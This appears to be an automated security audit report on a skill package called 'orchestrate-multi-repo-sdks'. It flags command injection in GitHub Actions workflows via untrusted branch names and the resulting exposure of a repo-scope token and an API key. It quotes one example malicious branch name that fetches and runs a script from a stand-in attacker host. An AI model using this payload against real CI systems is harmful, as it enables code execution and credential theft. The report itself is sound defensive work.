orchestrate-multi-repo-sdks
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): Shell command injection via untrusted GitHub metadata.
- Ingestion points:
github.event.pull_request.head.refinreconcile-prs.yamlandinputs.feature_branchinsdk_generation.yaml. - Capability inventory: Execution of arbitrary shell commands via the GitHub Actions runner.
- Details: The workflows interpolate untrusted branch names directly into
runblocks using${{ ... }}syntax. An attacker can create a branch named\"; curl http://attacker.com | bash; #\"to execute code within the CI environment. - [DATA_EXFILTRATION] (HIGH): Exposure of high-privilege secrets.
- Evidence:
GH_TOKEN: ${{ secrets.SDK_REPOS_PAT }}andSPEAKEASY_API_KEY: ${{ secrets.SPEAKEASY_API_KEY }}. - Details: The vulnerable jobs have access to powerful credentials, including a Personal Access Token with
reposcope. An attacker exploiting the command injection can exfiltrate these tokens, leading to full compromise of the connected repositories.
Recommendations
- AI detected serious security threats
Audit Metadata